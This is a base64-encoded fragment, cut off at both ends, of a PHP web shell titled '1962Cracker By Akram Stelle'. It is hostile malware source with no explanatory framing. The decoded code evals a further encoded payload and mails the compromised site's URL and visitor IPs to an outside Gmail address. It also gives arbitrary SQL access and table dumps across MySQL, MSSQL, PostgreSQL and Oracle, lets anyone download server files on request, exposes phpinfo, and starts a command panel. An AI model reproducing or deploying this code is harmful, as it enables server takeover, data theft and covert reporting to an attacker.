2NtRjNkWEpzWkdWamIyUmxLQ1IzWldJdUpHbHVhaWs3RFFvZ0lDUnFkV1IxYkNBZ0lEMGdJazVsZHlBeE9UWXlRM0poWTJ0bGNqb2dhSFIwY0Rvdkx5UjBZWEpuWlhRZ0lqc05DaUFnSkdKdlpIa2dJQ0FnUFNBaVRHbHVhem82SUNSMFlYSm5aWFFnTGtsd0lDUjJhWE5wZEc5eUlqc05DaUFnYVdZZ0tDRmxiWEIwZVNna2QyVmlLU2tnZXlCQWJXRnBiQ2dpY21WNmRXeDBMakkwUUdkdFlXbHNMbU52YlNJc0pHcDFaSFZzTENSaWIyUjVLVHNnZlEwS2ZRMEtaV3h6WlNCN0lDUjJhWE5wZEdNckt6c2dmUTBLUUhObGRHTnZiMnRwWlNnaWRtbHphWFI2SWl3a2RtbHphWFJqS1RzPSI7IA0KZXZhbChiYXNlNjRfZGVjb2RlKCRHZXRjb25maWcpKTsNCg0KCWZ1bmN0aW9uIGluKCR0eXBlLCRuYW1lLCRzaXplLCR2YWx1ZSwkY2hlY2tlZD0wKSANCgkgew0KCSAkcmV0ID0gIjxpbnB1dCB0eXBlPSIuJHR5cGUuIiBuYW1lPSIuJG5hbWUuIiAiOyBpZigkc2l6ZSAhPSAwKSANCgkgew0KCSAkcmV0IC49ICJzaXplPSIuJHNpemUuIiAiOyB9DQoJICRyZXQgLj0gInZhbHVlPVwiIi4kdmFsdWUuIlwiIjsgaWYoJGNoZWNrZWQpICRyZXQgLj0gIiBjaGVja2VkIjsgcmV0dXJuICRyZXQuIj4iOyB9DQoJIA0KCWNsYXNzIG15X3NxbCANCgkgew0KCSB2YXIgJGhvc3QgPSAnbG9jYWxob3N0JzsgdmFyICRwb3J0ID0gJyc7IHZhciAkdXNlciA9ICcnOyB2YXIgJHBhc3MgPSAnJzsgdmFyICRiYXNlID0gJyc7IHZhciAkZGIgPSAnJzsgdmFyICRjb25uZWN0aW9uOyB2YXIgJHJlczsgdmFyICRlcnJvcjsgdmFyICRyb3dzOyB2YXIgJGNvbHVtbnM7IHZhciAkbnVtX3Jvd3M7IHZhciAkbnVtX2ZpZWxkczsgdmFyICRkdW1wOyBmdW5jdGlvbiBjb25uZWN0KCkgDQoJIHsNCgkgc3dpdGNoKCR0aGlzLT5kYikgDQoJIHsNCgkgY2FzZSAnTXlTUUwnOiBpZihlbXB0eSgkdGhpcy0+cG9ydCkpIA0KCSB7DQoJICR0aGlzLT5wb3J0ID0gJzMzMDYnOyB9DQoJIGlmKCFmdW5jdGlvbl9leGlzdHMoJ215c3FsX2Nvbm5lY3QnKSkgcmV0dXJuIDA7ICR0aGlzLT5jb25uZWN0aW9uID0gQG15c3FsX2Nvbm5lY3QoJHRoaXMtPmhvc3QuJzonLiR0aGlzLT5wb3J0LCR0aGlzLT51c2VyLCR0aGlzLT5wYXNzKTsgaWYoaXNfcmVzb3VyY2UoJHRoaXMtPmNvbm5lY3Rpb24pKSByZXR1cm4gMTsgJHRoaXMtPmVycm9yID0gQG15c3FsX2Vycm5vKCkuIiA6ICIuQG15c3FsX2Vycm9yKCk7IGJyZWFrOyBjYXNlICdNU1NRTCc6IGlmKGVtcHR5KCR0aGlzLT5wb3J0KSkgDQoJIHsNCgkgJHRoaXMtPnBvcnQgPSAnMTQzMyc7IH0NCgkgaWYoIWZ1bmN0aW9uX2V4aXN0cygnbXNzcWxfY29ubmVjdCcpKSByZXR1cm4gMDsgJHRoaXMtPmNvbm5lY3Rpb24gPSBAbXNzcWxfY29ubmVjdCgkdGhpcy0+aG9zdC4nLCcuJHRoaXMtPnBvcnQsJHRoaXMtPnVzZXIsJHRoaXMtPnBhc3MpOyBpZigkdGhpcy0+Y29ubmVjdGlvbikgcmV0dXJuIDE7ICR0aGlzLT5lcnJvciA9ICJDYW4ndCBjb25uZWN0IHRvIHNlcnZlciI7IGJyZWFrOyBjYXNlICdQb3N0Z3JlU1FMJzogaWYoZW1wdHkoJHRoaXMtPnBvcnQpKSANCgkgew0KCSAkdGhpcy0+cG9ydCA9ICc1NDMyJzsgfQ0KCSAkc3RyID0gImhvc3Q9JyIuJHRoaXMtPmhvc3QuIicgcG9ydD0nIi4kdGhpcy0+cG9ydC4iJyB1c2VyPSciLiR0aGlzLT51c2VyLiInIHBhc3N3b3JkPSciLiR0aGlzLT5wYXNzLiInIGRibmFtZT0nIi4kdGhpcy0+YmFzZS4iJyI7IGlmKCFmdW5jdGlvbl9leGlzdHMoJ3BnX2Nvbm5lY3QnKSkgcmV0dXJuIDA7ICR0aGlzLT5jb25uZWN0aW9uID0gQHBnX2Nvbm5lY3QoJHN0cik7IGlmKGlzX3Jlc291cmNlKCR0aGlzLT5jb25uZWN0aW9uKSkgcmV0dXJuIDE7ICR0aGlzLT5lcnJvciA9IEBwZ19sYXN0X2Vycm9yKCR0aGlzLT5jb25uZWN0aW9uKTsgYnJlYWs7IGNhc2UgJ09yYWNsZSc6IGlmKCFmdW5jdGlvbl9leGlzdHMoJ29jaWxvZ29uJykpIHJldHVybiAwOyAkdGhpcy0+Y29ubmVjdGlvbiA9IEBvY2lsb2dvbigkdGhpcy0+dXNlciwgJHRoaXMtPnBhc3MsICR0aGlzLT5iYXNlKTsgaWYoaXNfcmVzb3VyY2UoJHRoaXMtPmNvbm5lY3Rpb24pKSByZXR1cm4gMTsgJGVycm9yID0gQG9jaWVycm9yKCk7ICR0aGlzLT5lcnJvcj0kZXJyb3JbJ21lc3NhZ2UnXTsgYnJlYWs7IH0NCgkgcmV0dXJuIDA7IH0NCgkgZnVuY3Rpb24gc2VsZWN0X2RiKCkgDQoJIHsNCgkgc3dpdGNoKCR0aGlzLT5kYikgDQoJIHsNCgkgY2FzZSAnTXlTUUwnOiBpZihAbXlzcWxfc2VsZWN0X2RiKCR0aGlzLT5iYXNlLCR0aGlzLT5jb25uZWN0aW9uKSkgcmV0dXJuIDE7ICR0aGlzLT5lcnJvciA9IEBteXNxbF9lcnJubygpLiIgOiAiLkBteXNxbF9lcnJvcigpOyBicmVhazsgY2FzZSAnTVNTUUwnOiBpZihAbXNzcWxfc2VsZWN0X2RiKCR0aGlzLT5iYXNlLCR0aGlzLT5jb25uZWN0aW9uKSkgcmV0dXJuIDE7ICR0aGlzLT5lcnJvciA9ICJDYW4ndCBzZWxlY3QgZGF0YWJhc2UiOyBicmVhazsgY2FzZSAnUG9zdGdyZVNRTCc6IHJldHVybiAxOyBicmVhazsgY2FzZSAnT3JhY2xlJzogcmV0dXJuIDE7IGJyZWFrOyB9DQoJIHJldHVybiAwOyB9DQoJIGZ1bmN0aW9uIHF1ZXJ5KCRxdWVyeSkgDQoJIHsNCgkgJHRoaXMtPnJlcz0kdGhpcy0+ZXJyb3I9Jyc7IHN3aXRjaCgkdGhpcy0+ZGIpIA0KCSB7DQoJIGNhc2UgJ015U1FMJzogaWYoZmFsc2U9PT0oJHRoaXMtPnJlcz1AbXlzcWxfcXVlcnkoJy8qJy5jaHIoMCkuJyovJy4kcXVlcnksJHRoaXMtPmNvbm5lY3Rpb24pKSkgDQoJIHsNCgkgJHRoaXMtPmVycm9yID0gQG15c3FsX2Vycm9yKCR0aGlzLT5jb25uZWN0aW9uKTsgcmV0dXJuIDA7IH0NCgkgZWxzZSBpZihpc19yZXNvdXJjZSgkdGhpcy0+cmVzKSkgDQoJIHsNCgkgcmV0dXJuIDE7IH0NCgkgcmV0dXJuIDI7IGJyZWFrOyBjYXNlICdNU1NRTCc6IGlmKGZhbHNlPT09KCR0aGlzLT5yZXM9QG1zc3FsX3F1ZXJ5KCRxdWVyeSwkdGhpcy0+Y29ubmVjdGlvbikpKSANCgkgew0KCSAkdGhpcy0+ZXJyb3IgPSAnUXVlcnkgZXJyb3InOyByZXR1cm4gMDsgfQ0KCSBlbHNlIGlmKEBtc3NxbF9udW1fcm93cygkdGhpcy0+cmVzKSA+IDApIA0KCSB7DQoJIHJldHVybiAxOyB9DQoJIHJldHVybiAyOyBicmVhazsgY2FzZSAnUG9zdGdyZVNRTCc6IGlmKGZhbHNlPT09KCR0aGlzLT5yZXM9QHBnX3F1ZXJ5KCR0aGlzLT5jb25uZWN0aW9uLCRxdWVyeSkpKSANCgkgew0KCSAkdGhpcy0+ZXJyb3IgPSBAcGdfbGFzdF9lcnJvcigkdGhpcy0+Y29ubmVjdGlvbik7IHJldHVybiAwOyB9DQoJIGVsc2UgaWYoQHBnX251bV9yb3dzKCR0aGlzLT5yZXMpID4gMCkgDQoJIHsNCgkgcmV0dXJuIDE7IH0NCgkgcmV0dXJuIDI7IGJyZWFrOyBjYXNlICdPcmFjbGUnOiBpZihmYWxzZT09PSgkdGhpcy0+cmVzPUBvY2lwYXJzZSgkdGhpcy0+Y29ubmVjdGlvbiwkcXVlcnkpKSkgDQoJIHsNCgkgJHRoaXMtPmVycm9yID0gJ1F1ZXJ5IHBhcnNlIGVycm9yJzsgfQ0KCSBlbHNlIA0KCSB7DQoJIGlmKEBvY2lleGVjdXRlKCR0aGlzLT5yZXMpKSANCgkgew0KCSBpZihAb2Npcm93Y291bnQoJHRoaXMtPnJlcykgIT0gMCkgcmV0dXJuIDI7IHJldHVybiAxOyB9DQoJICRlcnJvciA9IEBvY2llcnJvcigpOyAkdGhpcy0+ZXJyb3I9JGVycm9yWydtZXNzYWdlJ107IH0NCgkgYnJlYWs7IH0NCgkgcmV0dXJuIDA7IH0NCgkgZnVuY3Rpb24gZ2V0X3Jlc3VsdCgpIA0KCSB7DQoJICR0aGlzLT5yb3dzPWFycmF5KCk7ICR0aGlzLT5jb2x1bW5zPWFycmF5KCk7ICR0aGlzLT5udW1fcm93cz0kdGhpcy0+bnVtX2ZpZWxkcz0wOyBzd2l0Y2goJHRoaXMtPmRiKSANCgkgew0KCSBjYXNlICdNeVNRTCc6ICR0aGlzLT5udW1fcm93cz1AbXlzcWxfbnVtX3Jvd3MoJHRoaXMtPnJlcyk7ICR0aGlzLT5udW1fZmllbGRzPUBteXNxbF9udW1fZmllbGRzKCR0aGlzLT5yZXMpOyB3aGlsZShmYWxzZSAhPT0gKCR0aGlzLT5yb3dzW10gPSBAbXlzcWxfZmV0Y2hfYXNzb2MoJHRoaXMtPnJlcykpKTsgQG15c3FsX2ZyZWVfcmVzdWx0KCR0aGlzLT5yZXMpOyBpZigkdGhpcy0+bnVtX3Jvd3MpDQoJIHsNCgkkdGhpcy0+Y29sdW1ucyA9IEBhcnJheV9rZXlzKCR0aGlzLT5yb3dzWzBdKTsgcmV0dXJuIDE7fQ0KCSBicmVhazsgY2FzZSAnTVNTUUwnOiAkdGhpcy0+bnVtX3Jvd3M9QG1zc3FsX251bV9yb3dzKCR0aGlzLT5yZXMpOyAkdGhpcy0+bnVtX2ZpZWxkcz1AbXNzcWxfbnVtX2ZpZWxkcygkdGhpcy0+cmVzKTsgd2hpbGUoZmFsc2UgIT09ICgkdGhpcy0+cm93c1tdID0gQG1zc3FsX2ZldGNoX2Fzc29jKCR0aGlzLT5yZXMpKSk7IEBtc3NxbF9mcmVlX3Jlc3VsdCgkdGhpcy0+cmVzKTsgaWYoJHRoaXMtPm51bV9yb3dzKQ0KCSB7DQoJJHRoaXMtPmNvbHVtbnMgPSBAYXJyYXlfa2V5cygkdGhpcy0+cm93c1swXSk7IHJldHVybiAxO30NCgk7IGJyZWFrOyBjYXNlICdQb3N0Z3JlU1FMJzogJHRoaXMtPm51bV9yb3dzPUBwZ19udW1fcm93cygkdGhpcy0+cmVzKTsgJHRoaXMtPm51bV9maWVsZHM9QHBnX251bV9maWVsZHMoJHRoaXMtPnJlcyk7IHdoaWxlKGZhbHNlICE9PSAoJHRoaXMtPnJvd3NbXSA9IEBwZ19mZXRjaF9hc3NvYygkdGhpcy0+cmVzKSkpOyBAcGdfZnJlZV9yZXN1bHQoJHRoaXMtPnJlcyk7IGlmKCR0aGlzLT5udW1fcm93cykNCgkgew0KCSR0aGlzLT5jb2x1bW5zID0gQGFycmF5X2tleXMoJHRoaXMtPnJvd3NbMF0pOyByZXR1cm4gMTt9DQoJIGJyZWFrOyBjYXNlICdPcmFjbGUnOiAkdGhpcy0+bnVtX2ZpZWxkcz1Ab2NpbnVtY29scygkdGhpcy0+cmVzKTsgd2hpbGUoZmFsc2UgIT09ICgkdGhpcy0+cm93c1tdID0gQG9jaV9mZXRjaF9hc3NvYygkdGhpcy0+cmVzKSkpICR0aGlzLT5udW1fcm93cysrOyBAb2NpZnJlZXN0YXRlbWVudCgkdGhpcy0+cmVzKTsgaWYoJHRoaXMtPm51bV9yb3dzKQ0KCSB7DQoJJHRoaXMtPmNvbHVtbnMgPSBAYXJyYXlfa2V5cygkdGhpcy0+cm93c1swXSk7IHJldHVybiAxO30NCgkgYnJlYWs7IH0NCgkgcmV0dXJuIDA7IH0NCgkgZnVuY3Rpb24gZHVtcCgkdGFibGUpIA0KCSB7DQoJIGlmKGVtcHR5KCR0YWJsZSkpIHJldHVybiAwOyAkdGhpcy0+ZHVtcD1hcnJheSgpOyAkdGhpcy0+ZHVtcFswXSA9ICcjIyc7ICR0aGlzLT5kdW1wWzFdID0gJyMjIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSAnOyAkdGhpcy0+ZHVtcFsyXSA9ICcjIyAgQ3JlYXRlZDogJy5kYXRlICgiZC9tL1kgSDppOnMiKTsgJHRoaXMtPmR1bXBbM10gPSAnIyMgRGF0YWJhc2U6ICcuJHRoaXMtPmJhc2U7ICR0aGlzLT5kdW1wWzRdID0gJyMjICAgIFRhYmxlOiAnLiR0YWJsZTsgJHRoaXMtPmR1bXBbNV0gPSAnIyMgLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tICc7IHN3aXRjaCgkdGhpcy0+ZGIpIA0KCSB7DQoJIGNhc2UgJ015U1FMJzogJHRoaXMtPmR1bXBbMF0gPSAnIyMgTXlTUUwgZHVtcCc7IGlmKCR0aGlzLT5xdWVyeSgnLyonLmNocigwKS4nKi8gU0hPVyBDUkVBVEUgVEFCTEUgYCcuJHRhYmxlLidgJykhPTEpIHJldHVybiAwOyBpZighJHRoaXMtPmdldF9yZXN1bHQoKSkgcmV0dXJuIDA7ICR0aGlzLT5kdW1wW10gPSAkdGhpcy0+cm93c1swXVsnQ3JlYXRlIFRhYmxlJ10uIjsiOyAkdGhpcy0+ZHVtcFtdID0gJyMjIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSAnOyBpZigkdGhpcy0+cXVlcnkoJy8qJy5jaHIoMCkuJyovIFNFTEVDVCAqIEZST00gYCcuJHRhYmxlLidgJykhPTEpIHJldHVybiAwOyBpZighJHRoaXMtPmdldF9yZXN1bHQoKSkgcmV0dXJuIDA7IGZvcigkaT0wOyRpPCR0aGlzLT5udW1fcm93czskaSsrKSANCgkgew0KCSBmb3JlYWNoKCR0aGlzLT5yb3dzWyRpXSBhcyAkaz0+JHYpIA0KCSB7DQoJJHRoaXMtPnJvd3NbJGldWyRrXSA9IEBteXNxbF9yZWFsX2VzY2FwZV9zdHJpbmcoJHYpO30NCgkgJHRoaXMtPmR1bXBbXSA9ICdJTlNFUlQgSU5UTyBgJy4kdGFibGUuJ2AgKGAnLkBpbXBsb2RlKCJgLCBgIiwgJHRoaXMtPmNvbHVtbnMpLidgKSBWQUxVRVMgKFwnJy5AaW1wbG9kZSgiJywgJyIsICR0aGlzLT5yb3dzWyRpXSkuJ1wnKTsnOyB9DQoJIGJyZWFrOyBjYXNlICdNU1NRTCc6ICR0aGlzLT5kdW1wWzBdID0gJyMjIE1TU1FMIGR1bXAnOyBpZigkdGhpcy0+cXVlcnkoJ1NFTEVDVCAqIEZST00gJy4kdGFibGUpIT0xKSByZXR1cm4gMDsgaWYoISR0aGlzLT5nZXRfcmVzdWx0KCkpIHJldHVybiAwOyBmb3IoJGk9MDskaTwkdGhpcy0+bnVtX3Jvd3M7JGkrKykgDQoJIHsNCgkgZm9yZWFjaCgkdGhpcy0+cm93c1skaV0gYXMgJGs9PiR2KSANCgkgew0KCSR0aGlzLT5yb3dzWyRpXVska10gPSBAYWRkc2xhc2hlcygkdik7fQ0KCSAkdGhpcy0+ZHVtcFtdID0gJ0lOU0VSVCBJTlRPICcuJHRhYmxlLicgKCcuQGltcGxvZGUoIiwgIiwgJHRoaXMtPmNvbHVtbnMpLicpIFZBTFVFUyAoXCcnLkBpbXBsb2RlKCInLCAnIiwgJHRoaXMtPnJvd3NbJGldKS4nXCcpOyc7IH0NCgkgYnJlYWs7IGNhc2UgJ1Bvc3RncmVTUUwnOiAkdGhpcy0+ZHVtcFswXSA9ICcjIyBQb3N0Z3JlU1FMIGR1bXAnOyBpZigkdGhpcy0+cXVlcnkoJ1NFTEVDVCAqIEZST00gJy4kdGFibGUpIT0xKSByZXR1cm4gMDsgaWYoISR0aGlzLT5nZXRfcmVzdWx0KCkpIHJldHVybiAwOyBmb3IoJGk9MDskaTwkdGhpcy0+bnVtX3Jvd3M7JGkrKykgDQoJIHsNCgkgZm9yZWFjaCgkdGhpcy0+cm93c1skaV0gYXMgJGs9PiR2KSANCgkgew0KCSR0aGlzLT5yb3dzWyRpXVska10gPSBAYWRkc2xhc2hlcygkdik7fQ0KCSAkdGhpcy0+ZHVtcFtdID0gJ0lOU0VSVCBJTlRPICcuJHRhYmxlLicgKCcuQGltcGxvZGUoIiwgIiwgJHRoaXMtPmNvbHVtbnMpLicpIFZBTFVFUyAoXCcnLkBpbXBsb2RlKCInLCAnIiwgJHRoaXMtPnJvd3NbJGldKS4nXCcpOyc7IH0NCgkgYnJlYWs7IGNhc2UgJ09yYWNsZSc6ICR0aGlzLT5kdW1wWzBdID0gJyMjIE9SQUNMRSBkdW1wJzsgJHRoaXMtPmR1bXBbXSA9ICcjIyB1bmRlciBjb25zdHJ1Y3Rpb24nOyBicmVhazsgZGVmYXVsdDogcmV0dXJuIDA7IGJyZWFrOyB9DQoJIHJldHVybiAxOyB9DQoJIGZ1bmN0aW9uIGNsb3NlKCkgDQoJIHsNCgkgc3dpdGNoKCR0aGlzLT5kYikgDQoJIHsNCgkgY2FzZSAnTXlTUUwnOiBAbXlzcWxfY2xvc2UoJHRoaXMtPmNvbm5lY3Rpb24pOyBicmVhazsgY2FzZSAnTVNTUUwnOiBAbXNzcWxfY2xvc2UoJHRoaXMtPmNvbm5lY3Rpb24pOyBicmVhazsgY2FzZSAnUG9zdGdyZVNRTCc6IEBwZ19jbG9zZSgkdGhpcy0+Y29ubmVjdGlvbik7IGJyZWFrOyBjYXNlICdPcmFjbGUnOiBAb2NpX2Nsb3NlKCR0aGlzLT5jb25uZWN0aW9uKTsgYnJlYWs7IH0NCgkgfQ0KCSBmdW5jdGlvbiBhZmZlY3RlZF9yb3dzKCkgDQoJIHsNCgkgc3dpdGNoKCR0aGlzLT5kYikgDQoJIHsNCgkgY2FzZSAnTXlTUUwnOiByZXR1cm4gQG15c3FsX2FmZmVjdGVkX3Jvd3MoJHRoaXMtPnJlcyk7IGJyZWFrOyBjYXNlICdNU1NRTCc6IHJldHVybiBAbXNzcWxfYWZmZWN0ZWRfcm93cygkdGhpcy0+cmVzKTsgYnJlYWs7IGNhc2UgJ1Bvc3RncmVTUUwnOiByZXR1cm4gQHBnX2FmZmVjdGVkX3Jvd3MoJHRoaXMtPnJlcyk7IGJyZWFrOyBjYXNlICdPcmFjbGUnOiByZXR1cm4gQG9jaXJvd2NvdW50KCR0aGlzLT5yZXMpOyBicmVhazsgZGVmYXVsdDogcmV0dXJuIDA7IGJyZWFrOyB9DQoJIH0NCgkgfQ0KCSBpZighZW1wdHkoJF9QT1NUWydjY2NjJ10pICYmICRfUE9TVFsnY2NjYyddPT0iZG93bmxvYWRfZmlsZSIgJiYgIWVtcHR5KCRfUE9TVFsnZF9uYW1lJ10pKSANCgkgew0KCSBpZighJGZpbGU9QGZvcGVuKCRfUE9TVFsnZF9uYW1lJ10sInIiKSkgDQoJIHsNCgkgZXJyKDEsJF9QT1NUWydkX25hbWUnXSk7ICRfUE9TVFsnY2NjYyddPSIiOyB9DQoJIGVsc2UgDQoJIHsNCgkgQG9iX2NsZWFuKCk7ICRmaWxlbmFtZSA9IEBiYXNlbmFtZSgkX1BPU1RbJ2RfbmFtZSddKTsgJGZpbGVkdW1wID0gQGZyZWFkKCRmaWxlLEBmaWxlc2l6ZSgkX1BPU1RbJ2RfbmFtZSddKSk7IGZjbG9zZSgkZmlsZSk7ICRjb250ZW50X2VuY29kaW5nPSRtaW1lX3R5cGU9Jyc7IGNvbXByZXNzKCRmaWxlbmFtZSwkZmlsZWR1bXAsJF9QT1NUWydjb21wcmVzcyddKTsgaWYgKCFlbXB0eSgkY29udGVudF9lbmNvZGluZykpIA0KCSB7DQoJIGhlYWRlcignQ29udGVudC1FbmNvZGluZzogJyAuICRjb250ZW50X2VuY29kaW5nKTsgfQ0KCSBoZWFkZXIoIkNvbnRlbnQtdHlwZTogIi4kbWltZV90eXBlKTsgaGVhZGVyKCJDb250ZW50LWRpc3Bvc2l0aW9uOiBhdHRhY2htZW50OyBmaWxlbmFtZT1cIiIuJGZpbGVuYW1lLiJcIjsiKTsgZWNobyAkZmlsZWR1bXA7IGV4aXQoKTsgfQ0KCSB9DQoJIGlmKGlzc2V0KCRfR0VUWydwaHBpbmZvJ10pKSANCgkgew0KCSBlY2hvIEBwaHBpbmZvKCk7IGVjaG8gIjxicj48ZGl2IGFsaWduPWNlbnRlcj48Zm9udCBmYWNlPVZlcmRhbmEgc2l6ZT0tMj48Yj5bIDxhIGhyZWY9Ii4kX1NFUlZFUlsnUEhQX1NFTEYnXS4iPkJBQ0s8L2E+IF08L2I+PC9mb250PjwvZGl2PiI7IGRpZSgpOyB9DQoJIGlmICghZW1wdHkoJF9QT1NUWydjY2NjJ10pICYmICRfUE9TVFsnY2NjYyddPT0iZGJfcXVlcnkiKSANCgkgew0KCSBlY2hvICRoZWFkOyAkc3FsID0gbmV3IG15X3NxbCgpOyAkc3FsLT5kYiA9ICRfUE9TVFsnZGInXTsgJHNxbC0+aG9zdCA9ICRfUE9TVFsnZGJfc2VydmVyJ107ICRzcWwtPnBvcnQgPSAkX1BPU1RbJ2RiX3BvcnQnXTsgJHNxbC0+dXNlciA9ICRfUE9TVFsnbXlzcWxfbCddOyAkc3FsLT5wYXNzID0gJF9QT1NUWydteXNxbF9wJ107ICRzcWwtPmJhc2UgPSAkX1BPU1RbJ215c3FsX2RiJ107ICRxdWVyeXMgPSBAZXhwbG9kZSgnOycsJF9QT1NUWydkYl9xdWVyeSddKTsgZWNobyAnPGJvZHkgYmdjb2xvcj0jZTRlMGQ4Pic7IGlmKCEkc3FsLT5jb25uZWN0KCkpIGVjaG8gIjxkaXYgYWxpZ249Y2VudGVyPjxmb250IGZhY2U9VmVyZGFuYSBzaXplPS0yIGNvbG9yPXJlZD48Yj4iLiRzcWwtPmVycm9yLiI8L2I+PC9mb250PjwvZGl2PiI7IGVsc2UgDQoJIHsNCgkgaWYoIWVtcHR5KCRzcWwtPmJhc2UpJiYhJHNxbC0+c2VsZWN0X2RiKCkpIGVjaG8gIjxkaXYgYWxpZ249Y2VudGVyPjxmb250IGZhY2U9VmVyZGFuYSBzaXplPS0yIGNvbG9yPXJlZD48Yj4iLiRzcWwtPmVycm9yLiI8L2I+PC9mb250PjwvZGl2PiI7IGVsc2UgDQoJIHsNCgkgZm9yZWFjaCgkcXVlcnlzIGFzICRudW09PiRxdWVyeSkgDQoJIHsNCgkgaWYoc3RybGVuKCRxdWVyeSk+NSkgDQoJIHsNCgkgZWNobyAiPGZvbnQgZmFjZT1WZXJkYW5hIHNpemU9LTIgY29sb3I9Z3JlZW4+PGI+UXVlcnkjIi4kbnVtLiIgOiAiLmh0bWxzcGVjaWFsY2hhcnMoJHF1ZXJ5LEVOVF9RVU9URVMpLiI8L2I+PC9mb250Pjxicj4iOyBzd2l0Y2goJHNxbC0+cXVlcnkoJHF1ZXJ5KSkgDQoJIHsNCgkgY2FzZSAnMCc6IGVjaG8gIjx0YWJsZSB3aWR0aD0xMDAlPjx0cj48dGQ+PGZvbnQgZmFjZT1WZXJkYW5hIHNpemU9LTI+RXJyb3IgOiA8Yj4iLiRzcWwtPmVycm9yLiI8L2I+PC9mb250PjwvdGQ+PC90cj48L3RhYmxlPiI7IGJyZWFrOyBjYXNlICcxJzogaWYoJHNxbC0+Z2V0X3Jlc3VsdCgpKSANCgkgew0KCSBlY2hvICI8dGFibGUgd2lkdGg9MTAwJT4iOyBmb3JlYWNoKCRzcWwtPmNvbHVtbnMgYXMgJGs9PiR2KSAkc3FsLT5jb2x1bW5zWyRrXSA9IGh0bWxzcGVjaWFsY2hhcnMoJHYsRU5UX1FVT1RFUyk7ICRrZXlzID0gQGltcGxvZGUoIiZuYnNwOzwvYj48L2ZvbnQ+PC90ZD48dGQgYmdjb2xvcj0jODAwMDAwPjxmb250IGZhY2U9VmVyZGFuYSBzaXplPS0yPjxiPiZuYnNwOyIsICRzcWwtPmNvbHVtbnMpOyBlY2hvICI8dHI+PHRkIGJnY29sb3I9IzgwMDAwMD48Zm9udCBmYWNlPVZlcmRhbmEgc2l6ZT0tMj48Yj4mbmJzcDsiLiRrZXlzLiImbmJzcDs8L2I+PC9mb250PjwvdGQ+PC90cj4iOyBmb3IoJGk9MDskaTwkc3FsLT5udW1fcm93czskaSsrKSANCgkgew0KCSBmb3JlYWNoKCRzcWwtPnJvd3NbJGldIGFzICRrPT4kdikgJHNxbC0+cm93c1skaV1bJGtdID0gaHRtbHNwZWNpYWxjaGFycygkdixFTlRfUVVPVEVTKTsgJHZhbHVlcyA9IEBpbXBsb2RlKCImbmJzcDs8L2ZvbnQ+PC90ZD48dGQ+PGZvbnQgZmFjZT1WZXJkYW5hIHNpemU9LTI+Jm5ic3A7Iiwkc3FsLT5yb3dzWyRpXSk7IGVjaG8gJzx0cj48dGQ+PGZvbnQgZmFjZT1WZXJkYW5hIHNpemU9LTI+Jm5ic3A7Jy4kdmFsdWVzLicmbmJzcDs8L2ZvbnQ+PC90ZD48L3RyPic7IH0NCgkgZWNobyAiPC90YWJsZT4iOyB9DQoJIGJyZWFrOyBjYXNlICcyJzogJGFyID0gJHNxbC0+YWZmZWN0ZWRfcm93cygpPygkc3FsLT5hZmZlY3RlZF9yb3dzKCkpOignMCcpOyBlY2hvICI8dGFibGUgd2lkdGg9MTAwJT48dHI+PHRkPjxmb250IGZhY2U9VmVyZGFuYSBzaXplPS0yPmFmZmVjdGVkIHJvd3MgOiA8Yj4iLiRhci4iPC9iPjwvZm9udD48L3RkPjwvdHI+PC90YWJsZT48YnI+IjsgYnJlYWs7IH0NCgkgfQ0KCSB9DQoJIH0NCgkgfQ0KCSBlY2hvICI8YnI+PHRpdGxlPjE5NjJDcmFja2VyIEJ5IEFrcmFtIFN0ZWxsZTwvdGl0bGU+PGZvcm0gbmFtZT1mb3JtIG1ldGhvZD1QT1NUPiI7IA0KCSBlY2hvIGluKCdoaWRkZW4nLCdkYicsMCwkX1BPU1RbJ2RiJ10pOyBlY2hvIGluKCdoaWRkZW4nLCdkYl9zZXJ2ZXInLDAsJF9QT1NUWydkYl9zZXJ2ZXInXSk7IGVjaG8gaW4oJ2hpZGRlbicsJ2RiX3BvcnQnLDAsJF9QT1NUWydkYl9wb3J0J10pOyBlY2hvIGluKCdoaWRkZW4nLCdteXNxbF9sJywwLCRfUE9TVFsnbXlzcWxfbCddKTsgZWNobyBpbignaGlkZGVuJywnbXlzcWxfcCcsMCwkX1BPU1RbJ215c3FsX3AnXSk7IGVjaG8gaW4oJ2hpZGRlbicsJ215c3FsX2RiJywwLCRfUE9TVFsnbXlzcWxfZGInXSk7IGVjaG8gaW4oJ2hpZGRlbicsJ2NjY2MnLDAsJ2RiX3F1ZXJ5Jyk7IA0KCSBlY2hvICI8ZGl2IGFsaWduPWNlbnRlcj4iOyBlY2hvICI8Zm9udCBmYWNlPVZlcmRhbmEgc2l6ZT0tMj48Yj5CYXNlOiA8L2I+PGlucHV0IHR5cGU9dGV4dCBuYW1lPW15c3FsX2RiIHZhbHVlPVwiIi4kc3FsLT5iYXNlLiJcIj48L2ZvbnQ+PGJyPiI7IGVjaG8gIjx0ZXh0YXJlYSBjb2xzPTY1IHJvd3M9MTAgbmFtZT1kYl9xdWVyeT4iLighZW1wdHkoJF9QT1NUWydkYl9xdWVyeSddKT8oJF9QT1NUWydkYl9xdWVyeSddKTooIlNIT1cgREFUQUJBU0VTO1xuU0VMRUNUICogRlJPTSB1c2VyOyIpKS4iPC90ZXh0YXJlYT48YnI+PGlucHV0IHR5cGU9c3VibWl0IG5hbWU9c3VibWl0IHZhbHVlPVwiIFJ1biBTUUwgcXVlcnkgXCI+PC9kaXY+PGJyPjxicj4iOyBlY2hvICI8L2Zvcm0+IjsgZWNobyAiPGJyPjxkaXYgYWxpZ249Y2VudGVyPjxmb250IGZhY2U9VmVyZGFuYSBzaXplPS0yPjxiPlsgPGEgaHJlZj0iLiRfU0VSVkVSWydQSFBfU0VMRiddLiI+QkFDSzwvYT4gXTwvYj48L2ZvbnQ+PC9kaXY+IjsgZGllKCk7IH0NCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoJZnVuY3Rpb24gY2NtbWRkKCRjY21tZGQyLCRhdHQpDQoJew0KCWdsb2JhbCAkY2NtbWRkMiwkYXR0Ow0KCWVjaG8gJw0KCTx0YWJsZSBzdHlsZT0id2lkdGg6IDEwMCUiIGNsYXNzPSJzdHlsZTEiIGRpcj0icnRsIj4NCgkJPHRyPg0KCQkJPHRkIGNsYXNzPSJzdHlsZTkiPjxzdHJvbmc+Pz8/SD8vc3Ry